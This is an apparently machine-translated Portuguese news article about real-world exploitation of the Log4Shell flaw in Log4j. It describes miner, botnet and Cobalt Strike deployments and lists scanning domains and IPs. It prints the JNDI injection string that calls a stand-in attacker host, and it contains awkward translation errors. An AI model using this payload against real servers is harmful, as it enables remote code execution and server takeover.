Pesquisadores de segurança já estão escaneando a rede em busca de produtos afetados por um bug perigoso na biblioteca Log4j e estão corrigindo os resultados de ataques de cibercriminosos a uma vulnerabilidade do Log4Shell.
A vulnerabilidade já está sendo explorada para implantar mineradores, Faróis Cobalt Strike, etc..
Um problema na popular biblioteca de log Log4j incluída no Apache Logging Project foi relatado na semana passada. A vulnerabilidade de dia 0 recebeu o identificador CVE-2021-44228 e marcou 10 fora de 10 pontos na escala de classificação de vulnerabilidade CVSS, pois permite a execução remota de código arbitrário (RCE).
O problema é agravado pelo fato de explorações PoC já terem aparecido na rede, e a vulnerabilidade pode ser explorada remotamente, que não requer habilidades técnicas avançadas.
A vulnerabilidade força aplicativos e servidores baseados em Java que usam a biblioteca Log4j a registrar uma linha específica em seus sistemas internos. Quando um aplicativo ou servidor processa esses logs, uma string pode fazer com que o sistema vulnerável carregue e execute um script malicioso do domínio controlado pelo invasor. O resultado será um sequestro completo do aplicativo ou servidor vulnerável.
Deixe-me lembrá-lo de que o patch já foi lançado como parte do 2.15.0 liberar.
Os ataques ao Log4Shell já começaram, Computador bipando agora relata. A publicação diz que para explorar o bug. Um invasor pode alterar o agente do usuário de seu navegador e visitar um site específico ou pesquisar uma string no site usando o formato ${jndi:ldap://[URL_do_atacante]}.
Isso eventualmente adicionará uma linha aos logs de acesso do servidor web, e quando o aplicativo Log4j analisa esses logs e encontra a linha, um erro forçará o servidor a executar um retorno de chamada ou solicitar o URL especificado na linha JNDI. Os invasores podem então usar esse URL para enviar comandos ao dispositivo vulnerável (classes codificadas em Base64 ou Java).
Pior, o simples envio de uma conexão pode ser usado para determinar se um servidor remoto é vulnerável ao Log4Shell.
É relatado que os invasores já estão usando o Log4Shell para executar scripts de shell que baixam e instalam vários mineradores. Em particular, os hackers por trás do malware Kinsing e do botnet de mesmo nome abusam ativamente do bug Log4j e usam cargas Base64 que forçam o servidor vulnerável a baixar e executar scripts de shell. O script remove o malware concorrente do dispositivo vulnerável e, em seguida, baixa e instala o malware Kinsing, que começará a minerar a criptomoeda.
Por sua vez, Especialistas chineses da Netlab 360 avisar que a vulnerabilidade está sendo usada para instalar malware Mirai e Muhstik em dispositivos vulneráveis. Essas ameaças à IoT tornam os dispositivos vulneráveis parte de botnets, use-os para extrair criptomoeda, e conduzir ataques DDoS em grande escala.
De acordo com Analistas da Microsoft, uma vulnerabilidade no Log4j também é usada para descartar beacons Cobalt Strike. Inicialmente, Cobalt Strike é uma ferramenta comercial legítima criada para pen-testers e equipes vermelhas focadas na exploração e pós-exploração. Infelizmente, há muito tempo é amado por hackers, de grupos APT governamentais a operadores de ransomware.
Até aqui, não há evidências que garantam que o ransomware adotou uma exploração para o Log4j. Ainda, de acordo com os especialistas, a implantação de beacons Cobalt Strike indica que tais ataques são inevitáveis.
Também, além de usar o Log4Shell para instalar diversos malwares, os invasores usam o problema para verificar servidores vulneráveis e obter informações deles. Por exemplo, a exploração mostrada abaixo pode forçar servidores vulneráveis a acessar URLs ou realizar pesquisas de DNS para domínios de retorno de chamada. Isso permite que especialistas em segurança da informação e hackers determinem se um servidor é vulnerável e o utilizem para ataques futuros., pesquisar, ou tentando obter uma recompensa por bugs de seus proprietários.
Os jornalistas estão preocupados que alguns pesquisadores possam ir longe demais ao usar uma exploração para roubar variáveis de ambiente que contêm dados do servidor, incluindo o nome do host, nome de usuário sob o qual o serviço Log4j é executado, Informações do sistema operacional, e número da versão do sistema operacional.
Os domínios e endereços IP mais comuns usados para essas varreduras são:
- interactsh.com
- burpcollaborator.net
- dnslog.cn
- caixa${superior:a}ryedge.io
- leakix.net
- bingsearchlib. com
- 205.185.115.217:47324
- bingsearchlib. com:39356
- canarytokens.com